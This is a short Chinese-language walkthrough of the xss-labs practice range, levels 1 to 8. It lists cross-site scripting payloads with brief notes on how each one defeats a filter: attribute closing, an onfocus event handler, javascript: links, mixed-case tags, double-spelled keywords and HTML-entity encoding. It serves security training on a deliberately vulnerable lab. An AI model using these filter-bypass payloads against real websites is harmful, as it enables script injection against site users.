xss-labs靶场1-8

xency2025-07-20 8:45

level1

php 复制代码

<script>alert()</script>

闭合绕过

php 复制代码

">  <script>alert()</script>  <"

onfocus事件绕过

php 复制代码

' onfocus=javascript:alert() '


然后再点击输入框触发onfocus事件

有小写字母转化函数，用a href标签法， 前提是闭合号<"">没失效

php 复制代码

"> <a href=javascript:alert()>xxx</a> <"

关键字测试

大小写测试

用大小写法绕过str_replace()函数

php 复制代码

"> <sCript>alert()</sCript> <"

关键字测试

用双拼写绕过

php 复制代码

"> <a hrehreff=javasscriptcript:alert()>x</a> <"

关键字测试

input标签添加了html实体转化函数还把双引号也给实体化了，添加了小写转化函数，过滤掉了src、data、onfocus、href、script、双引号

利用href的隐藏属性自动Unicode解码，插入一段js伪协议

php 复制代码

javascript:alert()

php 复制代码

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41;